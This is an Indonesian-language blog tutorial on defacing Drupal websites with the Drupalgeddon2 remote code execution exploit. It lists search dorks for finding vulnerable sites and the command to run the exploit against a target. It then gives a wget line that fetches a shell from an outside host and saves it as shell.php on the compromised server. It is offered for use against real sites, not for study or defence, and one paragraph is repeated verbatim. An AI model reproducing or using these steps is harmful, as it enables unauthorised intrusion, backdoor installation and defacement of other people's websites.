squadcyber - Hai guys, sudah lama nggak buat artikel tentang deface lagi ya hehe, kali ini gw akan membawakan tutorial deface dengan metode Drupal RCE.
Remote Code Execution adalah sama seperti arbitary code execution, dimana membuat attacker mempunyai kemampuan untuk mengeksekusi perintah di mesin target, biasanya memanfaatkan kelemahan aplikasi yang dijadikan target eksploitasi, bedanya dengan Remote Code Execution adalah sang attacker melakukan injeksi coding melalui dengan mesin yang berbeda, maksudnya dilakukan secara remote terhadap mesin target.
Remote Code Execution adalah sama seperti arbitary code execution, dimana membuat attacker mempunyai kemampuan untuk mengeksekusi perintah di mesin target, biasanya memanfaatkan kelemahan aplikasi yang dijadikan target eksploitasi, bedanya dengan Remote Code Execution adalah sang attacker melakukan injeksi coding melalui dengan mesin yang berbeda, maksudnya dilakukan secara remote terhadap mesin target.
Alat dan Bahan
- Tools Drupalgeddon2
- Shell Backdoor
- Linux / Termux
Dork
inurl:"/user/register" "Powered by Drupal" -CAPTCHA -"Access denied"
inurl:"user/register?element_parents=account/mail"
inurl:"*drupal_ajax"
kembangin lagi dork nya :*.
Cara Deface Drupal RCE
Yang harus kalian lakukan pertama kali adalah buka tools nya terlebih dahulu di termux atau linux kalian, lalu kita ngedork dengan dork yang sudah di sediakan di atas, atau bisa kalian kembangkan lagi.
Lalu buka terminal / termux dan ketikkan
$ ruby drupalgeddon2.rb targetkalian.com
Dan jika exploit kalian berhasil, maka akan muncul seperti ini.
Lalu tinggal upload shell/script kalian yang sudah terupload di dalam website dengan menggunakan wget, contoh nya.
$ wget http://web.com/shell.txt -O shell.php
Tinggal kalian akses shell/script kalian.
Demikian tutorial Deface Drupal RCE kali ini, semoga bermanfaat.
Thanks to Gh0st_Coder






Comments
Post a Comment